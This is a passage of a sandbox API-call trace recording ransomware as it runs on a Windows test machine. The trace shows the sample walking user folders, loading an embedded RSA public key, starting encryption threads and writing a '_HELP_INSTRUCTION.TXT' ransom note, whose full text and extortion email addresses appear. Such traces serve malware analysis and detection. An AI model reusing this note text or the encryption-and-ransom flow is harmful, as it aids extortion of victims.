lpFindFileData=0x17d320) returned 0x3cde9d8 [0236.535] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0236.535] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0236.535] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.535] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntldr") returned 0x0 [0236.535] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTLDR") returned 0x0 [0236.535] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0236.535] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0236.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0236.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0236.535] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 44 [0236.535] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.535] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0236.535] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0236.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1200 [0236.535] Sleep (dwMilliseconds=0x96) [0236.688] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.688] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0236.688] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0236.688] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0236.689] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0236.689] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0236.689] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0236.689] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0236.689] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0236.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0236.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0236.689] SetErrorMode (uMode=0x1) returned 0x1 [0236.689] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT") returned 61 [0236.689] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0236.689] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.689] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1204) returned 0x0 [0236.689] RegQueryValueExW (in: hKey=0x1204, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43db8c0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43db8c0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0236.689] RegCloseKey (hKey=0x1204) returned 0x0 [0236.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.689] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1204 [0236.689] CloseHandle (hObject=0x1204) returned 1 [0236.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0236.690] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0236.690] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0236.690] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0236.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0236.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0236.690] SetErrorMode (uMode=0x1) returned 0x1 [0236.690] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0236.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0236.690] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0236.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0236.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0236.690] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0236.690] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0236.690] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.690] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntldr") returned 0x0 [0236.690] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTLDR") returned 0x0 [0236.690] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0236.690] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntdetect.com") returned 0x0 [0236.690] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0236.690] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0236.690] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 44 [0236.690] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.690] lstrcpyW (in: lpString1=0x17cf1c, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0236.690] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0236.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120c [0236.690] Sleep (dwMilliseconds=0x96) [0236.844] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.844] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.844] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.844] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.844] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.844] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0236.845] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0236.845] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0236.845] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0236.845] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0236.845] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0236.845] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0236.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0236.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0236.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0236.845] SetErrorMode (uMode=0x1) returned 0x1 [0236.845] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT") returned 61 [0236.845] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0236.845] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.845] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1210) returned 0x0 [0236.845] RegQueryValueExW (in: hKey=0x1210, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dbaf0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dbaf0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0236.845] RegCloseKey (hKey=0x1210) returned 0x0 [0236.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.845] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1210 [0236.846] CloseHandle (hObject=0x1210) returned 1 [0236.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0236.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0236.846] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0236.846] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0236.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0236.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0236.846] SetErrorMode (uMode=0x1) returned 0x1 [0236.846] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0236.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0236.846] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0236.846] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0236.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0236.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0236.846] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0236.846] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.846] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntldr") returned 0x0 [0236.846] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTLDR") returned 0x0 [0236.846] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0236.846] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0236.847] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0236.847] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0236.847] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0236.847] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.847] lstrcpyW (in: lpString1=0x17be7c, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0236.847] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0236.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1218 [0236.847] Sleep (dwMilliseconds=0x96) [0237.000] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0237.000] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2="..") returned 1 [0237.000] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2=".") returned 1 [0237.000] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0237.000] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntldr") returned 0x0 [0237.001] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTLDR") returned 0x0 [0237.001] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.001] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0237.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0237.001] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0237.001] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 